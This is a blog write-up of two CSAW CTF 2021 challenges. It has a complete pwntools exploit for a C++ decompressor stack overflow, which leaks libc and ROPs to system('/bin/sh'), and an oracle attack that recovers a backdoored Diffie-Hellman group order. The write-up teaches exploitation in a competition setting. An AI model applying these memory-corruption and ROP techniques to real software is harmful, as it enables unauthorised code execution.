CSAW CTF Quals 2021

September 13, 2021

I was too lazy to make writeups last year

cold

This is a C++ pwn that decompresses an input string into an output string, both of type std::string. Under the hood, they are abstracted into Bitstream objects. The input bitstream serializes data, opcodes, and the output byte length.

struct std::basic_string_view
{
    uint64_t m_len;
    char* m_str;
};

struct Bitstream
{
    struct std::basic_string_view view;
    int64_t needle;
};

The vulnerability lies in opcode 3, where the output stream reads bits from earlier in the stream and writes them to the needle. During this process, we can read before and write past the allocated buffer.

This is not that impressive if the buffer lies on the heap. Even if there were an interesting heap overflow, the subsequent bounds check would immediately abort the program. Fortunately, std::basic_string is equipped with a small optimization – it uses a buffer on the stack if its length does not exceed 15 bytes.

_Alloc_hider    _M_dataplus;
size_type       _M_string_length;
enum { _S_local_capacity = 15 / sizeof(_CharT) };
union
{
  _CharT        _M_local_buf[_S_local_capacity + 1];
  size_type     _M_allocated_capacity;
};

By declaring a small output length, we’ve obtained a stack overflow! Below is a snapshot of the stack structure taken in main.

gef➤  x/40gx $sp+0x478

0x7fffc790ca28: 0x0000000044434241₀     0x0000000000000000₀
0x7fffc790ca38: 0x000000000000000f₁     0x00007fffc790ca28
0x7fffc790ca48: 0x0000000000000000      0x67a830e6acc54d00
0x7fffc790ca58: 0x00005599b243c330      0x00005599b243b170₂
0x7fffc790ca68: 0x0000000000000000      0x0000000000000000
0x7fffc790ca78: 0x00007fd94a46ab25₃     0x00007fffc790cb68

₀ out_string._M_local_buf
₁ out_stream.view.m_len
₂ _start
₃ __libc_start_main+213

The first thing to do is overwrite out_stream.view.m_len, which is located further down the stack. This allows the output stream’s needle to move freely. I did this by writing ffff, then performing a 0x10-sized repeat.

The next step is to seek forward and update the return address, which is currently __libc_start_main+213. One option is a partial overwrite, but I could not find a working one gadget in the provided libc. Instead I chose to loop back to _start, whose address was already on the stack.

The loop gives enough time to leak a libc address. I found a pointer to main_arena at $sp+0x410 and copied it into the string’s buffer. One thing to note is that Bitstream::get_bit is buggy for negative indices. In particular, if you want the char at _M_local_buf[-x], the least signifcant bit is correct but the upper 7 bits correspond to _M_local_buf[-x+1]. I ended up fixing the leak client-side.

On the second run, I ROP’d system("/bin/sh").

from pwn import *

context.terminal = ['tmux', 'splitw', '-h']

class Bitstream:
  def __init__(self, size):
    self.bits = []
    self.push(size, 0x14)

  def push(self, x, n):
    self.bits += list(bin(x)[2:].zfill(n))

  def write_bit(self, bit):
    self.push(1, 3)
    self.push(bit, 1)

  def write_char(self, char):
    self.push(2, 3)
    self.push(char & 0xff, 8)

  def write_word(self, word):
    for char in p64(word):
      self.write_char(char)

  def repeat(self, offset, n):
    self.push(3, 3)
    self.push(offset, 0xa)
    self.push(n, 0xa)

  def seek(self, offset):
    self.push(4, 3)
    self.push(offset & 0xffff, 16)

  def serialize(self):
    self.push(0, 3)
    return bytes([int(''.join(self.bits[i:i+8][::-1]), 2) for i in range(0, len(self.bits), 8)])

libc = ELF('./libc.so.6')

p = gdb.debug('./cold')

p.recvline()

gap = (0x488 - 0x478)*8

bs1 = Bitstream(15)

bs1.write_char(0xff)
bs1.write_char(0xff)
bs1.repeat(gap, gap)
bs1.seek(-gap - 2*8)

bs1.repeat((0x478 - 0x410)*8, 8*8)
bs1.seek(-8*8)

bs1.seek((0x4c8 - 0x478)*8)
bs1.repeat((0x4c8 - 0x4b0)*8, 8*8)

p.send(bs1.serialize())

p.recvuntil('Output: ')
libc_leak = bytearray(b'\x00' + p.recvline()[:-1].ljust(7, b'\x00'))
for i in range(len(libc_leak)-1):
  libc_leak[i] &= 0b11111110
  libc_leak[i] |= libc_leak[i+1] & 1
libc_base = u64(libc_leak) - libc.symbols['main_arena']

bs2 = Bitstream(15)

bs2.write_char(0xff)
bs2.write_char(0xff)
bs2.repeat(gap, gap)
bs2.seek(-gap - 2*8)

bs2.seek((0x4c8 - 0x478)*8)
bs2.write_word(libc_base + 0x27f75) # pop rdi ; ret
bs2.write_word(libc_base + next(libc.search(b'/bin/sh\x00')))
bs2.write_word(libc_base + libc.symbols['system'])

p.send(bs2.serialize())

p.interactive()

Bits

This is a neat example of a kleptographic backdoor, in this case for discrete logarithms. More details can be found at mimoo/Diffie-Hellman_Backdoor, but the upshot is that the group’s order is smooth, which allows the server to compute logarithms quickly. As outsiders we can’t do this, since we don’t even know the order! I was actually saving a challenge similar to this for DiceCTF, but it’ll have to be scrapped :(

Here, the server provides an oracle which computes discrete logarithms using the backdoor. Given an integer y, it returns (log(y) >> 833) & 1.

The first primitive I came up with was deriving the lower 833 bits of an exponent. Clearly we can get the 833rd bit by querying the server. Then I binary searched the minimum quantity required to flip this bit, which would be the truncated exponent’s negation.

def get_any_low(y):
  sentinel = query(y)
  x = 0
  for i in range(nbits - 123 - 1, -1, -1):
    if query(y * pow(g, x | (1 << i), n) % n) == sentinel:
      x |= 1 << i
  return (1 << (nbits - 123)) - x - 1

Next I turned to deriving the upper 123 bits of the group order. The idea is similar - we want to find the smallest value that causes a modular reduction. Clearly 2^nbits does, and we continue from most to least significant bits. It’s a bit trickier to realize, but the idea is that fiddling with the upper bits of a number shouldn’t affect the subtraction of lower bits.

def get_order_high():
  x = 0
  for i in range(nbits, nbits - 123, -1):
    if query(pow(g, x | (1 << i), n)) == 0:
      x |= 1 << i
  return x

Piecing everything together, I first found this approximate minimal value as well as its modular reduction, which is at most 833 bits. Subtracting gives the group order.

x = get_order_high()
x += 1 << (nbits - 123) # a guess?
order = x - get_any_low(pow(g, x, n))
print(order)

After this, you should be able to compute discrete logarithms from the server alone. But it turns out that the order’s factorization is on factor.db (yay) so I just solved with Pohlig-Hellman.